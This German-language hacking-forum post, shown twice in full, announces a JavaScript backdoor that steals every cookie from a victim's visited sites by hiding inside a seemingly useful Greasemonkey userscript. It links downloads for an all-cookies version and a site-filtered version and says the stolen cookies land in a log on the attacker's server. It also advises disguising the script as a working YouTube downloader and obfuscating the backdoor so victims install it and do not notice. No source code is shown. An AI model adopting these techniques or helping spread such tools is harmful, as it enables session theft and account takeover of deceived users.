Surflam
21.04.2012, 12:56
Hey,
hatte da vorhin eine Idee zu einem Backdoor in Javascript der alle Cookies klauen kann, so das man keine Xss injection benötigt sondern auf allen besuchten Websites die Cookies klauen kann:D Ist bisher nur ein ProofOfConcept also Zerfetzt mich nicht bei Bugs:neutral:
Q:Wie funktioniert es?
A:Kurz gesagt täuscht man ein nützliches Greasemonkey Script vor ,indem jedoch dann ein Backdoor-Injections Code versteckt ist der im Hintergrund den Backdoor injected:lol Vorraussetzung ist also das User das Injections-Script mit Greasemonkey installieren - deshalb muss man das Script entsprechend "Gut verpacken" damit es viele Installieren.
Q:Welche Cookies werden geloggt?
A:Alle die auf den besuchten Seiten des Victims exestieren
Q:Wo finde ich die geklauten Cookies?
A:Auf eurem Webserver in ./bd/log.html
Beispielfoto des Logfiles:
http://cycoder.square7.ch/bd/cookie_log.png
Download (Normal Version - Alle Cookies): http://cycoder.square7.ch/bd/BD(c)Cycode%20%5bJS%5d.rar (http://cycoder.square7.ch/bd/BD%28c%29Cycode%20%5bJS%5d.rar)
Download (Filter Version - Spezielle Cookies): http://cycoder.square7.ch/bd/BD_SpezialEdition%20%28c%29Cycode%20%5BJS%5D%20v0. 1.rar
UPDATE: Nun gibt es ne extra Version, in der man bewusst spezielle Homepages definieren kann von dennen dann nur die Cookies geklaut werden, alle anderen Homepages sind dann nicht im Log enthalten!
Info am Rande: Für das Inject Script ist es selbstverständlich das man wenn man diese Methode wirklich ernsthaft nutzen möchte das Script mit vielen Funktionen füllt und es entsprechend Verschleiert was wirklich geschieht, z.b ein Youtube Download Script vortäuschen (sollte natürlich funktionieren damit es viele installieren & installiert lassen) etc. - Das Backdoor Script kann man noch obfuscaden damit es findige User dann nicht so leicht haben das zu entziffern.. Nur so als Tipps am Rande bevor einer schreit "Das fällt doch jedem auf das dass ein Backdoor ist!" etc.
Würde mich über Feedback über die Idee freuen :D
hatte da vorhin eine Idee zu einem Backdoor in Javascript der alle Cookies klauen kann, so das man keine Xss injection benötigt sondern auf allen besuchten Websites die Cookies klauen kann:D Ist bisher nur ein ProofOfConcept also Zerfetzt mich nicht bei Bugs:neutral:
Q:Wie funktioniert es?
A:Kurz gesagt täuscht man ein nützliches Greasemonkey Script vor ,indem jedoch dann ein Backdoor-Injections Code versteckt ist der im Hintergrund den Backdoor injected:lol Vorraussetzung ist also das User das Injections-Script mit Greasemonkey installieren - deshalb muss man das Script entsprechend "Gut verpacken" damit es viele Installieren.
Q:Welche Cookies werden geloggt?
A:Alle die auf den besuchten Seiten des Victims exestieren
Q:Wo finde ich die geklauten Cookies?
A:Auf eurem Webserver in ./bd/log.html
Beispielfoto des Logfiles:
http://cycoder.square7.ch/bd/cookie_log.png
Download (Normal Version - Alle Cookies): http://cycoder.square7.ch/bd/BD(c)Cycode%20%5bJS%5d.rar (http://cycoder.square7.ch/bd/BD%28c%29Cycode%20%5bJS%5d.rar)
Download (Filter Version - Spezielle Cookies): http://cycoder.square7.ch/bd/BD_SpezialEdition%20%28c%29Cycode%20%5BJS%5D%20v0. 1.rar
UPDATE: Nun gibt es ne extra Version, in der man bewusst spezielle Homepages definieren kann von dennen dann nur die Cookies geklaut werden, alle anderen Homepages sind dann nicht im Log enthalten!
Info am Rande: Für das Inject Script ist es selbstverständlich das man wenn man diese Methode wirklich ernsthaft nutzen möchte das Script mit vielen Funktionen füllt und es entsprechend Verschleiert was wirklich geschieht, z.b ein Youtube Download Script vortäuschen (sollte natürlich funktionieren damit es viele installieren & installiert lassen) etc. - Das Backdoor Script kann man noch obfuscaden damit es findige User dann nicht so leicht haben das zu entziffern.. Nur so als Tipps am Rande bevor einer schreit "Das fällt doch jedem auf das dass ein Backdoor ist!" etc.
Würde mich über Feedback über die Idee freuen :D